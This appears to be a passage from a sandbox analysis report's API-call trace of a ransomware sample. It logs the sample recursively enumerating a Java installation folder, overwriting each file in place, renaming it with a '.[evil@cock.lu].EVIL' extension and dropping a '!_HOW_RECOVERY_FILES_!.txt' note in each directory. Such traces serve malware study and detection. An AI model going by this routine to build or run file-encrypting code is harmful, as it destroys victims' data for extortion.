_wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.935] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.935] __uncaught_exception () returned 0x84b1160800 [0093.935] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.936] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll.[evil@cock.lu].evil")) returned 1 [0093.936] ??_V@YAXPEAX@Z () returned 0x1 [0093.941] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\w2k_lsa_auth.dll", dwFileAttributes=0x0) returned 0 [0093.941] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.941] wcsstr (_Str="WindowsAccessBridge-64.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.941] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\WindowsAccessBridge-64.dll") returned 66 [0093.941] wcscmp (_String1="WindowsAccessBridge-64.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.941] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="WindowsAccessBridge-64.dll") returned 0x0 [0093.941] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\WindowsAccessBridge-64.dll") returned 0x42 [0093.941] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\windowsaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.943] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1ae40, lpOverlapped=0x0) returned 1 [0093.949] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.949] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.949] _errno () returned 0x84b1160840 [0093.949] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.949] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1ae60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1ae60, lpOverlapped=0x0) returned 1 [0093.949] CloseHandle (hObject=0x1a4) returned 1 [0093.950] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\WindowsAccessBridge-64.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.950] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.950] __uncaught_exception () returned 0x84b1160800 [0093.950] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.950] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\windowsaccessbridge-64.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\WindowsAccessBridge-64.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\windowsaccessbridge-64.dll.[evil@cock.lu].evil")) returned 1 [0093.951] ??_V@YAXPEAX@Z () returned 0x1 [0093.955] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\WindowsAccessBridge-64.dll", dwFileAttributes=0x0) returned 0 [0093.955] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.955] wcsstr (_Str="wsdetect.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.955] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\wsdetect.dll") returned 52 [0093.955] wcscmp (_String1="wsdetect.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.955] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="wsdetect.dll") returned 0x0 [0093.955] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\wsdetect.dll") returned 0x34 [0093.955] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\wsdetect.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.958] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2f040, lpOverlapped=0x0) returned 1 [0093.961] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.961] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.962] _errno () returned 0x84b1160840 [0093.962] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.962] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2f060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2f060, lpOverlapped=0x0) returned 1 [0093.962] CloseHandle (hObject=0x1a4) returned 1 [0093.962] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\wsdetect.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.963] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.963] __uncaught_exception () returned 0x84b1160800 [0093.963] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.963] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\wsdetect.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\wsdetect.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\wsdetect.dll.[evil@cock.lu].evil")) returned 1 [0093.964] ??_V@YAXPEAX@Z () returned 0x1 [0093.968] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\wsdetect.dll", dwFileAttributes=0x0) returned 0 [0093.968] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.968] wcsstr (_Str="zip.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.968] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\zip.dll") returned 47 [0093.969] wcscmp (_String1="zip.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.969] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="zip.dll") returned 0x0 [0093.969] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\zip.dll") returned 0x2f [0093.969] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\zip.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.971] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x13040, lpOverlapped=0x0) returned 1 [0094.011] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.011] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.011] _errno () returned 0x84b1160840 [0094.011] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.011] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x13060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x13060, lpOverlapped=0x0) returned 1 [0094.011] CloseHandle (hObject=0x1a4) returned 1 [0094.011] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\zip.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.011] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.012] __uncaught_exception () returned 0x84b1160800 [0094.012] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.012] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\zip.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\zip.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\zip.dll.[evil@cock.lu].evil")) returned 1 [0094.012] ??_V@YAXPEAX@Z () returned 0x1 [0094.015] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\zip.dll", dwFileAttributes=0x0) returned 0 [0094.015] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0094.015] FindClose (in: hFindFile=0x84b11dd680 | out: hFindFile=0x84b11dd680) returned 1 [0094.015] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin") returned 0x27 [0094.015] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.015] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.015] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.016] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0094.016] __uncaught_exception () returned 0x84b1160800 [0094.016] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.016] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0094.016] wcsstr (_Str="COPYRIGHT", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.016] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\COPYRIGHT") returned 45 [0094.016] wcscmp (_String1="COPYRIGHT", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.016] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="COPYRIGHT") returned 0x0 [0094.016] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\COPYRIGHT") returned 0x2d [0094.016] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_131\\copyright"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0094.018] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fde1e0*=0xcac, lpOverlapped=0x0) returned 1 [0094.044] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.044] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.044] _errno () returned 0x84b1160840 [0094.044] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.044] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0xcc0, lpOverlapped=0x0) returned 1 [0094.044] CloseHandle (hObject=0x1a0) returned 1 [0094.045] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\COPYRIGHT", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.045] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.045] __uncaught_exception () returned 0x84b1160800 [0094.045] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.045] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_131\\copyright"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\COPYRIGHT.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\copyright.[evil@cock.lu].evil")) returned 1 [0094.046] ??_V@YAXPEAX@Z () returned 0x1 [0094.049] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\COPYRIGHT", dwFileAttributes=0x0) returned 0 [0094.049] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0094.049] wcsstr (_Str="lib", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.049] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib") returned 39 [0094.049] wcscmp (_String1=".", _String2="lib") returned -1 [0094.049] wcscmp (_String1="..", _String2="lib") returned -1 [0094.049] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib") returned 0x27 [0094.049] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib") returned 0x0 [0094.049] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\*" [0094.049] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd0e0 [0094.051] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.051] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\.") returned 41 [0094.051] wcscmp (_String1=".", _String2=".") returned 0 [0094.051] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.145] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.145] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\..") returned 42 [0094.145] wcscmp (_String1=".", _String2="..") returned -1 [0094.145] wcscmp (_String1="..", _String2="..") returned 0 [0094.145] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.145] wcsstr (_Str="accessibility.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.145] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\accessibility.properties") returned 64 [0094.145] wcscmp (_String1="accessibility.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.145] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="accessibility.properties") returned 0x0 [0094.145] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\accessibility.properties") returned 0x40 [0094.145] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\accessibility.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0094.147] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x95, lpOverlapped=0x0) returned 1 [0094.150] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.150] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.150] _errno () returned 0x84b1160840 [0094.150] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.150] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xa0, lpOverlapped=0x0) returned 1 [0094.151] CloseHandle (hObject=0x1a4) returned 1 [0094.151] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\accessibility.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.151] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.151] __uncaught_exception () returned 0x84b1160800 [0094.151] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.155] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\accessibility.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\accessibility.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\accessibility.properties.[evil@cock.lu].evil")) returned 1 [0094.156] ??_V@YAXPEAX@Z () returned 0x1 [0094.160] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\accessibility.properties", dwFileAttributes=0x0) returned 0 [0094.160] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.161] wcsstr (_Str="amd64", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.161] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64") returned 45 [0094.161] wcscmp (_String1=".", _String2="amd64") returned -1 [0094.161] wcscmp (_String1="..", _String2="amd64") returned -1 [0094.161] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64") returned 0x2d [0094.161] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64") returned 0x0 [0094.161] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\*" [0094.161] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd800 [0094.161] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.161] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\.") returned 47 [0094.161] wcscmp (_String1=".", _String2=".") returned 0 [0094.161] FindNextFileW (in: hFindFile=0x84b11dd800, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.161] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.161] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\..") returned 48 [0094.161] wcscmp (_String1=".", _String2="..") returned -1 [0094.161] wcscmp (_String1="..", _String2="..") returned 0 [0094.161] FindNextFileW (in: hFindFile=0x84b11dd800, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.161] wcsstr (_Str="jvm.cfg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.161] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg") returned 53 [0094.161] wcscmp (_String1="jvm.cfg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.161] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jvm.cfg") returned 0x0 [0094.161] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg") returned 0x35 [0094.161] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.164] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x27a, lpOverlapped=0x0) returned 1 [0094.166] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.166] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.167] _errno () returned 0x84b1160840 [0094.167] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.167] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x280, lpOverlapped=0x0) returned 1 [0094.167] CloseHandle (hObject=0x1a8) returned 1 [0094.167] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.167] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.167] __uncaught_exception () returned 0x84b1160800 [0094.167] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.169] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg.[evil@cock.lu].evil")) returned 1 [0094.169] ??_V@YAXPEAX@Z () returned 0x1 [0094.173] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg", dwFileAttributes=0x0) returned 0 [0094.173] FindNextFileW (in: hFindFile=0x84b11dd800, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0094.173] FindClose (in: hFindFile=0x84b11dd800 | out: hFindFile=0x84b11dd800) returned 1 [0094.173] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64") returned 0x2d [0094.173] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.173] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.173] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.174] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0094.174] __uncaught_exception () returned 0x84b1160800 [0094.175] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.175] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.175] wcsstr (_Str="applet", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.175] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet") returned 46 [0094.175] wcscmp (_String1=".", _String2="applet") returned -1 [0094.175] wcscmp (_String1="..", _String2="applet") returned -1 [0094.175] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet") returned 0x2e [0094.175] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet") returned 0x0 [0094.176] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program 